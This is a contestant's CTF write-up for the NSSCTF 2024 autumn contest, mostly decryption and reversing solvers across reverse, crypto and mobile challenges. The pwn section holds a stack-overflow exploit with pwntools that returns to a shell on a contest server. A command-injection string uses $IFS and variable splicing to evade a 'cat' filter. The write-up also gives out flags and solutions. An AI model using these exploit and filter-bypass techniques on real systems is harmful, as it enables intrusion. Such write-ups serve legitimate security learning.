【NSSCTF】nssctf2024秋季招新赛赛

【NSSCTF】2024年NSSCTF秋季招新赛

Reverse

签到?

key加密

image-20241013155059504

密文:image-20241013155301253

主加密程序

image-20241013155325331

解密脚本:

a = [32,
  39,
  38,
  37,
  44,
  45,
  15,
  34,
  20,
  30,
  33,
  24,
  9,
  223,
  200,
  28,
  231,
  5,
  229,
  226,
  238,
  26,
  230,
  4,
  217,
  201,
  227,
  10,
  245,
  241,
  248,
  243,
  250,
  234,
  255,
  231,
  245,
  185,
  228,]
b = [104, 117, 117, 101, 114, 96, 0, 0]
flag = ''
for i in range(len(a)):
    flag += chr(a[i] ^ ((b[i % 6] & 0xFF) ^ 6) + i)
print(flag)

image-20241013155437868

又是签到!?

jadx打开mainacticity函数

image-20241013154932792

怎么才能看见flag呢

打开就能看到

image-20241013154733054

这也是py!?

复原字节码:

a = '~hojutfsfuoJ`pt`th^dcnbdsxAzESBRRM'
b = [0] * 59

if __name__ == "__main__":
    print("PLZ input your flag: ")
    c = input()
    
    for i in range(17):
        b[i] = ord(c[33 - i]) + 1
        b[33 - i] = ord(c[i]) - 1
    
    for i in range(34):
        if b[i] != ord(a[i]):
            print("Wrong!!!")
            exit(0)
    
    print("Great!!!")

解密脚本:

a = '~hojutfsfuoJ`pt`th^dcnbdsxAzESBRRM'
c = [0] * 34
flag = ''
for i in range(len(a)):
    c[33 - i] = ord(a[i]) + 1
    c[i] = ord(a[33 - i]) - 1
for i in c:
    flag += chr(i)
print(flag)

image-20241013154540594

NSS茶馆

加密函数在 sub_261118()中,是仅魔改了delta和round的tea加密

image-20241013154300805

密文在 byte_27E010

image-20241013154347903

以每两个四字节小端序为一组解密

解密脚本(我懒得再写一个for循环了,就一段一段复制进去分开解密三次:

#include <stdio.h>
#include <stdint.h>
void decrypt (uint32_t* v, uint32_t* k) {
    uint32_t v0=v[0], v1=v[1], sum=1131796 * 33, i;  
    uint32_t delta=1131796;                    
    uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3];   
    for (i=0; i<33; i++) {                        
        v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
        v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
        sum -= delta;
    }                                           
    v[0]=v0; v[1]=v1;
}
int main()
{
    uint32_t v[2]={0x71B6BC57, 0xE0AC0DA2},k[4]={0x0B, 0x16, 0x21, 0x2C};
    printf("origin:%u %u\n",v[0],v[1]);
    decrypt(v, k);
    printf("decryp:%x %x\n",v[0],v[1]);
    return 0;
}

感谢云水泱泱学长整的never gonna give you up活,您的彩蛋我看了

md5也能爆破?

为什么我写出解密脚本能爆破第一组爆破不了第二组,出题人解答一下捏

原理就是出题人忘记修改每一轮md5加密的初始值了,我就是按照这个思路做的,为什么我不对呢

这是我的脚本

#include <stdint.h>
#include <string.h>
#include<stdio.h>
//举例用的待处理文件原始数据

//举例用的待处理文件原始数据


//四个32位链接变量的初始化值
//第二轮
uint32_t INIT_A = 3016669311;
uint32_t INIT_B = 2512869821;
uint32_t INIT_C = 1744182635;
uint32_t INIT_D = 1282025769;

uint32_t a,b,c,d = 0;			//4轮逻辑计算中链接变量的过程量

uint32_t FileLen_Byte;			//文件填充前的长度(单位 - 字节)
uint32_t FileLen_Bit[2];		//文件填充前的长度(单位 - 位 bit)

uint8_t  MD5_ChangeBuff[64];	//临时缓存区 - 用于补位操作
uint32_t MD5_Buff[16];			//临时缓存区 - 用于每次运算装每组512 bit数据

uint8_t  MD5_Data[16];			//最终计算结果 - 文件的MD5值

#define F(x, y, z) 	(((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) 	(((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) 	((x) ^ (y) ^ (z))
#define I(x, y, z) 	((y) ^ ((x) | (~z)))

#define RL(x, y) 	(((x) << (y)) | ((x) >> (32 - (y))))  //x向左循环移y位

#define FF(a, b, c, d, x, s, ac) a = b + (RL((a + F(b,c,d) + x + ac),s))
#define GG(a, b, c, d, x, s, ac) a = b + (RL((a + G(b,c,d) + x + ac),s))
#define HH(a, b, c, d, x, s, ac) a = b + (RL((a + H(b,c,d) + x + ac),s))
#define II(a, b, c, d, x, s, ac) a = b + (RL((a + I(b,c,d) + x + ac),s))
//MD5核心算法,4轮共64次计算
void MD5_Calculate(uint32_t* A, uint32_t* B, uint32_t* C, uint32_t* D) {
    uint32_t a = *A, b = *B, c = *C, d = *D;


    /* Round 1 */
    FF (a, b, c, d, MD5_Buff[ 0],  7, 0xd76aa478); /**//* 1 */
    FF (d, a, b, c, MD5_Buff[ 1], 12, 0xe8c7b756); /**//* 2 */
    FF (c, d, a, b, MD5_Buff[ 2], 17, 0x242070db); /**//* 3 */
    FF (b, c, d, a, MD5_Buff[ 3], 22, 0xc1bdceee); /**//* 4 */
    FF (a, b, c, d, MD5_Buff[ 4],  7, 0xf57c0faf); /**//* 5 */
    FF (d, a, b, c, MD5_Buff[ 5], 12, 0x4787c62a); /**//* 6 */
    FF (c, d, a, b, MD5_Buff[ 6], 17, 0xa8304613); /**//* 7 */
    FF (b, c, d, a, MD5_Buff[ 7], 22, 0xfd469501); /**//* 8 */
    FF (a, b, c, d, MD5_Buff[ 8],  7, 0x698098d8); /**//* 9 */
    FF (d, a, b, c, MD5_Buff[ 9], 12, 0x8b44f7af); /**//* 10 */
    FF (c, d, a, b, MD5_Buff[10], 17, 0xffff5bb1); /**//* 11 */
    FF (b, c, d, a, MD5_Buff[11], 22, 0x895cd7be); /**//* 12 */
    FF (a, b, c, d, MD5_Buff[12],  7, 0x6b901122); /**//* 13 */
    FF (d, a, b, c, MD5_Buff[13], 12, 0xfd987193); /**//* 14 */
    FF (c, d, a, b, MD5_Buff[14], 17, 0xa679438e); /**//* 15 */
    FF (b, c, d, a, MD5_Buff[15], 22, 0x49b40821); /**//* 16 */

/* Round 2 */
    GG (a, b, c, d, MD5_Buff[ 1],  5, 0xf61e2562); /**//* 17 */
    GG (d, a, b, c, MD5_Buff[ 6],  9, 0xc040b340); /**//* 18 */
    GG (c, d, a, b, MD5_Buff[11], 14, 0x265e5a51); /**//* 19 */
    GG (b, c, d, a, MD5_Buff[ 0], 20, 0xe9b6c7aa); /**//* 20 */
    GG (a, b, c, d, MD5_Buff[ 5],  5, 0xd62f105d); /**//* 21 */
    GG (d, a, b, c, MD5_Buff[10],  9, 0x02441453); /**//* 22 */
    GG (c, d, a, b, MD5_Buff[15], 14, 0xd8a1e681); /**//* 23 */
    GG (b, c, d, a, MD5_Buff[ 4], 20, 0xe7d3fbc8); /**//* 24 */
    GG (a, b, c, d, MD5_Buff[ 9],  5, 0x21e1cde6); /**//* 25 */
    GG (d, a, b, c, MD5_Buff[14],  9, 0xc33707d6); /**//* 26 */
    GG (c, d, a, b, MD5_Buff[ 3], 14, 0xf4d50d87); /**//* 27 */
    GG (b, c, d, a, MD5_Buff[ 8], 20, 0x455a14ed); /**//* 28 */
    GG (a, b, c, d, MD5_Buff[13],  5, 0xa9e3e905); /**//* 29 */
    GG (d, a, b, c, MD5_Buff[ 2],  9, 0xfcefa3f8); /**//* 30 */
    GG (c, d, a, b, MD5_Buff[ 7], 14, 0x676f02d9); /**//* 31 */
    GG (b, c, d, a, MD5_Buff[12], 20, 0x8d2a4c8a); /**//* 32 */

    /* Round 3 */
    HH (a, b, c, d, MD5_Buff[ 5],  4, 0xfffa3942); /**//* 33 */
    HH (d, a, b, c, MD5_Buff[ 8], 11, 0x8771f681); /**//* 34 */
    HH (c, d, a, b, MD5_Buff[11], 16, 0x6d9d6122); /**//* 35 */
    HH (b, c, d, a, MD5_Buff[14], 23, 0xfde5380c); /**//* 36 */
    HH (a, b, c, d, MD5_Buff[ 1],  4, 0xa4beea44); /**//* 37 */
    HH (d, a, b, c, MD5_Buff[ 4], 11, 0x4bdecfa9); /**//* 38 */
    HH (c, d, a, b, MD5_Buff[ 7], 16, 0xf6bb4b60); /**//* 39 */
    HH (b, c, d, a, MD5_Buff[10], 23, 0xbebfbc70); /**//* 40 */
    HH (a, b, c, d, MD5_Buff[13],  4, 0x289b7ec6); /**//* 41 */
    HH (d, a, b, c, MD5_Buff[ 0], 11, 0xeaa127fa); /**//* 42 */
    HH (c, d, a, b, MD5_Buff[ 3], 16, 0xd4ef3085); /**//* 43 */
    HH (b, c, d, a, MD5_Buff[ 6], 23, 0x04881d05); /**//* 44 */
    HH (a, b, c, d, MD5_Buff[ 9],  4, 0xd9d4d039); /**//* 45 */
    HH (d, a, b, c, MD5_Buff[12], 11, 0xe6db99e5); /**//* 46 */
    HH (c, d, a, b, MD5_Buff[15], 16, 0x1fa27cf8); /**//* 47 */
    HH (b, c, d, a, MD5_Buff[ 2], 23, 0xc4ac5665); /**//* 48 */

    /* Round 4 */
    II (a, b, c, d, MD5_Buff[ 0],  6, 0xf4292244); /**//* 49 */
    II (d, a, b, c, MD5_Buff[ 7], 10, 0x432aff97); /**//* 50 */
    II (c, d, a, b, MD5_Buff[14], 15, 0xab9423a7); /**//* 51 */
    II (b, c, d, a, MD5_Buff[ 5], 21, 0xfc93a039); /**//* 52 */
    II (a, b, c, d, MD5_Buff[12],  6, 0x655b59c3); /**//* 53 */
    II (d, a, b, c, MD5_Buff[ 3], 10, 0x8f0ccc92); /**//* 54 */
    II (c, d, a, b, MD5_Buff[10], 15, 0xffeff47d); /**//* 55 */
    II (b, c, d, a, MD5_Buff[ 1], 21, 0x85845dd1); /**//* 56 */
    II (a, b, c, d, MD5_Buff[ 8],  6, 0x6fa87e4f); /**//* 57 */
    II (d, a, b, c, MD5_Buff[15], 10, 0xfe2ce6e0); /**//* 58 */
    II (c, d, a, b, MD5_Buff[ 6], 15, 0xa3014314); /**//* 59 */
    II (b, c, d, a, MD5_Buff[13], 21, 0x4e0811a1); /**//* 60 */
    II (a, b, c, d, MD5_Buff[ 4],  6, 0xf7537e82); /**//* 61 */
    II (d, a, b, c, MD5_Buff[11], 10, 0xbd3af235); /**//* 62 */
    II (c, d, a, b, MD5_Buff[ 2], 15, 0x2ad7d2bb); /**//* 63 */
    II (b, c, d, a, MD5_Buff[ 9], 21, 0xeb86d391); /**//* 64 */

    *A += a;
    *B += b;
    *C += c;
    *D += d;
}
char* md5(uint8_t *FileBuff, size_t size)
{
    uint8_t i = 0;
    static char MD5_String[33];  // 静态字符串用于返回
    uint32_t A = INIT_A, B = INIT_B, C = INIT_C, D = INIT_D;
    memset(MD5_String, 0, sizeof(MD5_String));

    //获取加密数据长度(单位 - 字节)
    FileLen_Byte = size;	//这里要注意减去字符串结束符'\0'占的一个字节长度

    //分组循环运算直至文件结束(每组 512 bit 即 每组 64 字节)
    for(i = 0; i < FileLen_Byte / 64; i++)
    {
        memset(MD5_Buff, 0, 64);   						//初始化 MD5_Buff 数组为0
        memcpy(&MD5_Buff[0], &FileBuff[i * 64], 64);	//高低位倒序赋值(大小端转换)
        MD5_Calculate(&A, &B, &C, &D);								//进行四轮逻辑计算
    }

    //最后一组不足512 bit,补位 “1” 和 “0”
    memset(MD5_Buff, 0, 64);   							//初始化 MD5_Buff(数组大小16,数据类型长度4字节)
    memset(MD5_ChangeBuff, 0, 64);						//初始化 MD5_ChangeBuff(数组大小64,数据类型长度1字节)

    memcpy(MD5_ChangeBuff, &FileBuff[FileLen_Byte - (FileLen_Byte % 64)], FileLen_Byte % 64);

    MD5_ChangeBuff[FileLen_Byte % 64] = 128;			//在文件末尾先补一个1和七个0,十进制128的二进制即1000 0000
    memcpy(&MD5_Buff[0], &MD5_ChangeBuff[0], 64);		//高低位倒序赋值(大小端转换)


    //补完第一个字节,128的二进制即1000 0000后,判断这一组还有没有空位放 文件填充前的长度(64bit,即8个字节)

    //若不够位置放,则再补一组512 bit,在那组的最后放文件填充前长度。
    if((FileLen_Byte % 64) > 55)		//64 - 1 - 8 = 55
    {
        MD5_Calculate(&A, &B, &C, &D);				//进行四轮逻辑计算
        memset(MD5_Buff, 0, 64);   		//初始化 MD5_Buff 数组为0
    }

    //在最后一个分组的最后补上原始文件填充前的长度(单位 - 位 bit)
    FileLen_Bit[1] = (uint32_t)(FileLen_Byte >> 29); // 右移29位,获取高位
    FileLen_Bit[0] = (uint32_t)(FileLen_Byte << 3);  // 左移3位,转为位长度

    memcpy(&MD5_Buff[14], FileLen_Bit, 8);				//末尾加入原文件的bit长度(文件填充前的长度(单位 - bit))

    MD5_Calculate(&A, &B, &C, &D);

    memcpy(&MD5_Data[0],  &A, 4);		//高低位倒序赋值
    memcpy(&MD5_Data[4],  &B, 4);		//高低位倒序赋值
    memcpy(&MD5_Data[8],  &C, 4);		//高低位倒序赋值
    memcpy(&MD5_Data[12], &D, 4);		//高低位倒序赋值

//	打印出MD5值 - 想打印的时候就删掉注释
    for (i = 0; i < 16; i++)
    {
        sprintf(&MD5_String[i * 2], "%02x", MD5_Data[i]);  // 每个字节占用2个字符
    }


//    printf("MD5 : %s\n", MD5_String);
//    printf("\nA = %u (0x%x)\n", A, A);
//    printf("B = %u (0x%x)\n", B, B);
//    printf("C = %u (0x%x)\n", C, C);
//    printf("D = %u (0x%x)\n", D, D);

    return MD5_String ;
}
int main() {
    char dic[] = "1234567890";
    char encrypt[] = "f182395ed4eaa34bf53fa0507e124c28";

    for (int i = 0; i < strlen(dic); i++) {
        for (int j = 0; j < strlen(dic); j++) {
            for (int k = 0; k < strlen(dic); k++) {
                for (int m = 0; m < strlen(dic); m++) {
                    uint8_t a = dic[i];
                    uint8_t b = dic[j];
                    uint8_t c = dic[k];
                    uint8_t d = dic[m];
                    uint8_t data[] = {a, b, c, d};
                    char *hash = md5(data, sizeof(data));
                    if (strcmp(hash, encrypt) == 0) {
                        printf("%c%c%c%c\n", dic[i], dic[j], dic[k], dic[m]);
                        printf("MD5: %s\n", hash);

                    }
                }

            }
        }

    }
return 0;
}

flower

影响程序执行的call retn花指令

先把这里的call改为jmp到下面那个函数

image-20241017195428268

对着main_0按u后p重新分析函数

image-20241017195557878

然后就可以对着上面的关键函数进行伪代码编译了

image-20241017195717488
按x顺着函数点回去就行

a = [84 , 57 ,105 ,115, 95, 70, 49, 111, 119, 53, 114, 95,105,115,95,86,101,114,121,95,66,101,52,117,54,105,102,57,108,125]
b= ''
for i in a:
    b += chr(i)
print(b)

好像也是py?

先把4.pyc修改文件头,把114514改成3.10版本的魔术头

然后用在线网站反编译pyc

image-20241017200456331

解密脚本:

import base64
a = 'RGtAXV59UXtqTWVbUVd4aWs='
key = '114514'
def decrypt(text, key):
    base64_decoded = base64.b64decode(text).decode()
    subbed = ''.join((chr(ord(c) - 3) if c.isalpha() else c for c in base64_decoded))
    swapped = subbed.swapcase()
    return ''.join((chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(swapped)))
decrypted_text = decrypt(a, key)
print('Decrypted flag:', decrypted_text)

来做数学

直接点进fun()函数,修改变量名

image-20241017200724826

猜测v1[0]是ord('N')

用z3求解

from z3 import *
x1, x2, x3, x4, x5, x6, x7, x8, x9, x10 = Ints('x1 x2 x3 x4 x5 x6 x7 x8 x9 x10')
x11, x12, x13, x14, x15, x16, x17, x18, x19, x20 = Ints('x11 x12 x13 x14 x15 x16 x17 x18 x19 x20')
v1_0 = 78
solver = Solver()
solver.add(x1 == 83)
solver.add(x4 + 32 * x3 + 43 * x2 + 81 * v1_0 + 35 * x5 == 14565)
solver.add(23 * x4 + 13 * x5 + 78 * x6 == 12436)
solver.add(19 * x15 + 10 * x14 + 17 * x13 + 15 * x12 + 12 * x10 + x9 / 4 + x7 + 32 * x6 + 23 * x8 + 10 * x16 == 12539)
solver.add(23 * x20 + 54 * x19 + 32 * x18 + 119 * x15 + 121 * x14 + 20 * x13 + 130 * x16 + 12 * x17 + 213 * x10 == 65168)
solver.add(1412 * x12 + 139 * x16 + 199 * x7 + 324 * x14 + 165 * x12 + 19 * x11 + 193 * x6 + 144 * x5 + 143 * x20 == 267159)
solver.add(867 * x13 + 654 * x11 + 678 * x9 + 175 * x7 + 45 * x5 + 21 * x1 + 13 * x3 + 100 * x15 + 24 * x17 == 244923)
solver.add(54 * x12 + 55 * x20 + 119 * x17 + 121 * x16 + 20 * x3 + 130 * x18 + 12 * x19 + 213 * x12 == 69874)
solver.add(x7 == 90)
solver.add(x20 == 125)
solver.add(233 * x10 + 134 * x2 + 378 * x4 + 133 * x9 + 178 * x6 + 443 * x5 + 11 * x1 + 543 * x11 == 188780)
solver.add(194 * x16 + 643 * x15 + 131 * x14 + 131 * x12 + 21 * x13 + 204 * x17 + 24 * x18 + 214 * x19 == 151642)
solver.add(123 * x18 + 25 * x16 + 124 * x13 + 37 * x14 + 7457 * x15 + 129 * x17 + 164 * x19 + 10 * x20 == 772291)
solver.add(132 * x16 + 807 * x15 + 756 * x14 + 163 * x13 + 633 * x12 + 423 * x11 + 42 * x10 + 534 * x17 == 346862)
solver.add(867 * x18 + 5956 * x13 + 204 * x12 + 374 * x10 + 47 * x9 + 485 * x15 + 37 * x16 + 375 * x20 == 740703)
solver.add(37 * x12 + 35 * x19 + 856 * x18 + 375 * x17 + 3578 * x16 + 567 * x3 + 55 * x20 + 21 * x4 == 436075)
solver.add(59 * x7 + 52 * x2 + 102 * x3 + 24 * x4 + 204 * x5 + 13 * x6 + 54 * x8 + 13 * x9 == 38344)
solver.add(98 * x7 + 85 * x6 + 13 * x4 + 19 * x3 + 12 * x1 + 166 * x2 + 25 * x5 + 23 * x8 == 39337)
solver.add(52 * v1_0 + 45 * x1 + 19 * x7 + 76 * x20 + 12 * x15 == 20141)
solver.add(56 * x1 + 34 * v1_0 + 75 * x7 + 80 * x20 + 16 * x15 + 19 * x12 == 27375)
solver.add(54 * x12 + 76 * x7 + 87 * x1 + 54 * v1_0 + 16 * x20 + 18 * x15 + 39 * x18 == 31598)
if solver.check() == sat:
    model = solver.model()
    result = ""
    for var in [x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15, x16, x17, x18, x19, x20]:
        if model.eval(var, model_completion=True) is not None:
            result += chr(model[var].as_long())
    print(result)
else:
    print("no")

动态调试

题目说明是rc4,直接下断点开始动调image-20241017201038179

加密字符串v1长度为44

image-20241017201237012

构造长度为44的字符串输入进去image-20241017201337491

修改input内存

image-20241017201658257

运行到加密结束

image-20241017202129355

不是,哥们,还有签到?

用c++写脚本,python数据处理不会溢出后取模

#include <iostream>
#include <cstdlib>
int main() {
    unsigned char encrypted[] = {
            0x63, 0x5E, 0x4C, 0x5A, 0x52, 0x15, 0x4A, 0x5A, 0x0D, 0x16,
            0x15, 0x12, 0x76, 0x7F, 0x01, 0x33, 0x2D, 0x35, 0x17, 0x7F,
            0x61, 0x0F, 0x21, 0x64, 0x3C, 0x31, 0x01, 0x40, 0x20, 0x5C,
            0x59
    };
    int len = sizeof(encrypted) / sizeof(encrypted[0]);
    srand(0x1BF52);
    for (int i = 0; i < len; ++i) {
        int rand_num = rand() % 100 + i;
        char decrypted_char = encrypted[i] ^ rand_num;
        std::cout << decrypted_char;
    }
    std::cout << std::endl;
    return 0;
}

image-20241017203205566

web

有一说一我直接开环境看js代码了,我以为是js逆向,。。。。。沟槽的看了三个小时,结果那俩js脚本根本不是拿来给你看的,,,,,,,,,,,(崩溃)

得把附件下下来,直接点开app.py,沟槽的加密文本直接展示出来了。。

image-20241018224900760

打开环境把密文复制下来,然后写脚本即可

image-20241018231801365

Pwn

nocat

代码块绕过

a=c;b=a;c=t;$a$b$c$IFS$1flag

image-20241013154103223

兄弟你的环境好香?

shell地址:image-20241021152838159

变量内存image-20241021152908992

exp:

from pwn import *

r = remote('node6.anna.nssctf.cn', 24859)
offset = 80 + 8
payload = b'A' * offset + p64(0x00000000004011E1 + 1)
r.sendline(payload)
r.interactive()

image-20241021152946982

Crypto

泰坦陨落2

种子的获得是乘法逆元,第二个加密是异或运算

from sympy import mod_inverse
#[3771924608, 3319331295, 583630258, 2401321321, 611326900]
a = 1664525
c = 1013904223
m = 2**32
key = 3771924608
re = mod_inverse(a, m)
key = ((key - c) * re) % m
key_bytes = key.to_bytes((key.bit_length() + 7) // 8, 'big')
key_length = len(key_bytes)
result = bytearray()
Encrypted_Bytes = b"n2!&t'\t\x06A\x14\x01\x00\x00\x16\x17EA\x13\x17ET\t\x17EC\x0e\x1e\nR\x12R\x0cNA\x06\rEA\x16\x04R\n\x0f"
for i in range(len(Encrypted_Bytes)):
    result.append(Encrypted_Bytes[i] ^ key_bytes[i % key_length])
print(result)

image-20241013153238504

Aftermath

套脚本

from Crypto.Util.number import *
from gmpy2 import gmpy2

n = 80722936701364382749961243326484006977187702986017980842794443374132452156776306032868217795522046975068822236770836452911408536092460646410756678157902792329645719935468879960944028782788489463895870961967670931567205550383999951787250211085264314795753745003815839218062934564501884684565508432346164094171
e1 = 3
flag1 = 77027474990431732719325428265107176934045610651944725251406683442684093440239073195437770144166442593914418380343458827052860752131667771506129334676070396374008929588455988149871039697387983766750148969695215583137356681988572655848921827794639096404716760310059622671470680330144220097050812716421370445797
e2 = 7
flag2 = 13491956530007991248882899018888359080930858500993821006822695375714947537976202424265808646466853291165511243721829370428583392329886743499827454177786585477285598196204906977043127274613692623229137936467994670727274820568522666762615055848367486507714640497446688083840123758417442971555904294548595887600
def rsa_gong_N_def(e1, e2, c1, c2, n):
    e1, e2, c1, c2, n = int(e1), int(e2), int(c1), int(c2), int(n)
    s = gmpy2.gcdext(e1, e2) 
    t = s[1]
    z = s[2]
    if t < 0: 
        t = - t
        c1 = gmpy2.invert(c1, n) 
    elif z < 0:
        z = -z
        c2 = gmpy2.invert(c2, n)
    m = (pow(c1, t, n) * pow(c2, z, n)) % n  
    return m


result = rsa_gong_N_def(e1, e2, flag1, flag2, n)
print(long_to_bytes(result))

image-20241013153046367

看懂了就来拿flag吧

flag直接摆出来了

image-20241011191456373

脚本跑不出来了吧

网络检索关键词 RSA 共模攻击 公钥相乘,找到参考文献

参考文献:[SWPUCTF 2021 新生赛]crypto(1~9)详细解题思路集外代软件安装,拓展安装,库函数安装_[swpuctf 2021 新生赛]crypto1-CSDN博客

n= 16282992590526808657350657123769110323293742472515808696156540766049532922340638986423163288656942484229334024198335416611687418341772216996129634991032127943095069143600315325916614910606100091970611448259491799589221889445348698100959509165262891180065554743420149168801638644589921791426690475846945077068114953844817073866258377206796158690941199907230130273657375727245023893672164113928189304228859412794067127721813637080447782673535996272223836127807775157150041664783263093604946744032762535394974814371771505843653571711445892969781888188805943142126747365056482511805191315474848971218180999336497135314654469910566730389765499603897685968204361422568601724914800686608628299192714352963744010136960423806304763245890692476493455775025753944860040020178234660999290356849442926396627701588938894161779071628447041006556793933320976506046066961014953196791133933438500843139378274786265308568167479880984705152809744111382599071097574636570516674122980589207824718402382459624138317432883921371298272851693734695823787102433937406420318428888224246291987404818042038201886113203158444083427668636941
c1= 15508846802476602732219982269293312372397631462289816533805702700260237855119470146237752798828431803179124957728439730580289236458563016332461725094295883030444173189424666004498359269921250956676320570006883951982237098373954348825003467019876101438948387668628518937831820206221522881150831840296199498447304138839838135264071071817072965792514115711621435317078108239744829134467948386247696344881838815422262901903767893118533887779588425725845820071451782420200868341564360095012698956683395031351656817392008005928265838760875070634021907630535014959579709368637536268853337028760833769278841040734409299575870823873616769863828516877971432999417800417684146077045836940988096634144368727546539602310924702126212020003620219218637652874119299016382481718659448722433296761241365473608283436835986184098161365747699791248301452334044327014782249692551362625130537300221641910570569803981153117200694806974917501061411963827755822672178568783269357196133308719688843211664095412087717861154226475203597889635926903753481174280305996204091501578865951177135086807765873529089048911740160698421289371229606
c2= 7038544062804420883340530319534054090343999593726615071597649914714397773106261660516938820194721330117082799104642674913839235601210294807255855747823709326405317366422536981850436536877639492293904186333547681934006229055311359852552059601531864585759120757265084674695094298158389804437120173997679271166467086009884419942249925895393890707373985126949313101489352481737754459985522998334847972008827503987883850638250024631354158979424169551575287515128697843093987592614974905262077415255065744686115142126350167970451060399517705823298929164793769442986603707135790651560436497661713972277808036463771768932747376668116480068277125579165831615220097562066809632099809702980365194257899499384219864311379004681733844738981954144617140038448109869114888325128710654235506628539192955240723379334422880368605005772426413018696218105733457019400100498450734710865067764542737004071080719589912326985050985424145053072697267879019954400205613591419766583673115931337146967400159040252514654983240188915104134405655336152730443436887872604467679522955837013574944135975481174502094839012368918547420588186051
e1e2= 59653
import libnum
import gmpy2
def rsa_gong_N_def(e1,e2,c1,c2,n):  #共模攻击函数
    e1, e2, c1, c2, n=int(e1),int(e2),int(c1),int(c2),int(n)
    print("e1,e2:",e1,e2)
    s = gmpy2.gcdext(e1, e2)
    print("mpz:",s)
    s1 = s[1]
    s2 = s[2]
    if s1 < 0:
        s1 = - s1
        c1 = gmpy2.invert(c1, n)
    elif s2 < 0:
        s2 = - s2
        c2 = gmpy2.invert(c2, n)
    m = (pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n
    return int(m)
def de(c, e, n): #因为此时的m不是真正的m,而是m^k,所以对m^k进行爆破
    k = 0
    while k<1000: #指定k小于1000
        mk = c + n*k
        flag, true1 = gmpy2.iroot(mk, e)  #返回的第一个数值为开方数,第二个数值为布尔型,可整除为true,可自行测试
        if True == true1:
            # print(libnum.n2s(int(flag)))
            return flag
        k += 1
for e1 in range(2,e1e2):
    if e1e2%e1==0:         #爆破可整除的e
        e2=e1e2//e1
        c=rsa_gong_N_def(e1, e2, c1, c2, n)
        e=gmpy2.gcd(e1,e2)
        m1=de(c, e, n)
        if m1:  #指定输出m1
            print(libnum.n2s(int(m1)))

image-20241013153003688

完全感觉Dreamer

cyber chief 解密

image-20241013152924790

Take what you want

键盘字母绘图加密

image-20241013152827650

Bury the Light

解密脚本:

from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes
from Crypto.Util.Padding import unpad
key_int = 268498734989386806140712175125788827088
key_bytes = long_to_bytes(key_int)
encrypted_data = b'g\xf6\xc8\x1d\x1ap\xb9\xefd\xcc\xf0t\xe8/O\x7f\x89\xa3l \x8bR[\x91\xddd\x11\x98tA\x12\xcc\xa5Jl\x08\xd7\x87\xa2M\x1c\xe46rm\x16\x9b('
cipher = AES.new(key_bytes, AES.MODE_ECB)
try:
    decrypted_data = unpad(cipher.decrypt(encrypted_data), 16)
    print("Decrypted flag:", decrypted_data.decode())
except ValueError as e:
    print("Error in decryption or padding:", str(e))

image-20241019135925025

Mobile

TryUrFrida

获取包名

aapt dump badging TryUrFrida.apk

launchable-activity: name='com.example.mobile5.MainActivity' label='' icon=''

com.example.mobile5.MainActivity

com.example.mobile5这个便是我们要的

运行frida server

adb.exe connect 127.0.0.1:16384
adb shell
su
cd /data/local/tmp
chmod 777 frida-server-16.5.6-android-x86_64
./frida-server-16.5.6-android-x86_64

jadx分析源程序

image-20241020144723168

这里是主加密程序,很简单的一个异或,我们可以想办法得到key,也就是hook getKey()函数,让它把key输出

编写hook程序

Java.perform(function() {   //初始化java环境
 
    var MainActivity = Java.use("com.example.mobile5.MainActivity");   // 找到 MainActivity 类

   
    MainActivity.getKey.implementation = function() {    // Hook getKey() 方法,implementation就是用来hook的
      
        var key = this.getKey();   // 调用原始的 getKey() 方法以获取实际的返回值

     
        console.log("[*] getKey() returned: ", key);     // 直接打印原始密钥

     
        return key;      // 返回原始密钥
    }
});

启动frida

frida -U -f com.example.mobile5 -l test.js

在应用界面输入一个符合长度的flag,然后confirm就可以输出key了

image-20241020144154305

解密

image-20241020145445383

貌似也可以hook check()函数,但返回值只是一个true,并没有说返回flag,所以直接hook getkey()返回key就行

hidden

flag_1和flag_2直接全局搜索找到

image-20241013152400984

image-20241013152419051

flag_3看到有drawable方法,上网搜,了解了apk的原理是文件的打包,改apk后缀为zip后即可在drawable文件下找到flag_3图片

image-20241013152526092

NSSCTF{f0eaf15f-7eab-4b1c-b65b-75c043f77ff9}

SolveEEEEEEEEEEEEEEEE

SM4加密

image-20241016193525506
这里是e,也就是key的加密,用z3约束求解

from z3 import *
solver = Solver()
e = [Int(f'e[{i}]') for i in range(16)]
for i in range(16):
    solver.add(e[i] >= 32, e[i] <= 126)
solver.add(-e[0] * 40121 + e[1] * 88747 + e[2] * 55419 - e[3] * 60207 - e[4] * 95655 - e[5] * 67998 - e[6] * 71501 + e[7] * 27064 - e[8] * 92288 + e[9] * 49014 + e[10] * 48742 + e[11] * 59486 + e[12] * 67057 + e[13] * 44330 - e[14] * 18877 + e[15] * 54300 == 13674754)
solver.add(e[0] * 20764 - e[1] * 56132 + e[2] * 42361 - e[3] * 47999 + e[4] * 18926 + e[5] * 25960 + e[6] * 41000 - e[7] * 83148 - e[8] * 81635 - e[9] * 32392 + e[10] * 37496 - e[11] * 36577 + e[12] * 55541 - e[13] * 66888 + e[14] * 52446 - e[15] * 47572 == -5760864)
solver.add(-e[0] * 14605 + e[1] * 47959 - e[2] * 54165 + e[3] * 33315 + e[4] * 86734 + e[5] * 27524 + e[6] * 12166 + e[7] * 78395 - e[8] * 63947 - e[9] * 83458 - e[10] * 94907 + e[11] * 22419 + e[12] * 67604 + e[13] * 70447 - e[14] * 19622 + e[15] * 59656 == 12441718)
solver.add(e[0] * 86310 + e[1] * 21353 + e[2] * 46828 + e[3] * 38303 - e[4] * 32129 + e[5] * 54291 - e[6] * 61675 + e[7] * 19828 + e[8] * 10954 - e[9] * 54374 - e[10] * 21653 - e[11] * 83445 - e[12] * 15664 + e[13] * 19714 + e[14] * 40625 - e[15] * 16154 == -1660207)
solver.add(-e[0] * 87252 + e[1] * 38546 - e[2] * 32173 - e[3] * 45440 - e[4] * 33557 + e[5] * 41302 - e[6] * 68980 + e[7] * 79887 - e[8] * 34309 - e[9] * 62055 + e[10] * 85301 - e[11] * 12160 + e[12] * 64158 + e[13] * 17253 + e[14] * 96113 + e[15] * 49936 == 17554556)
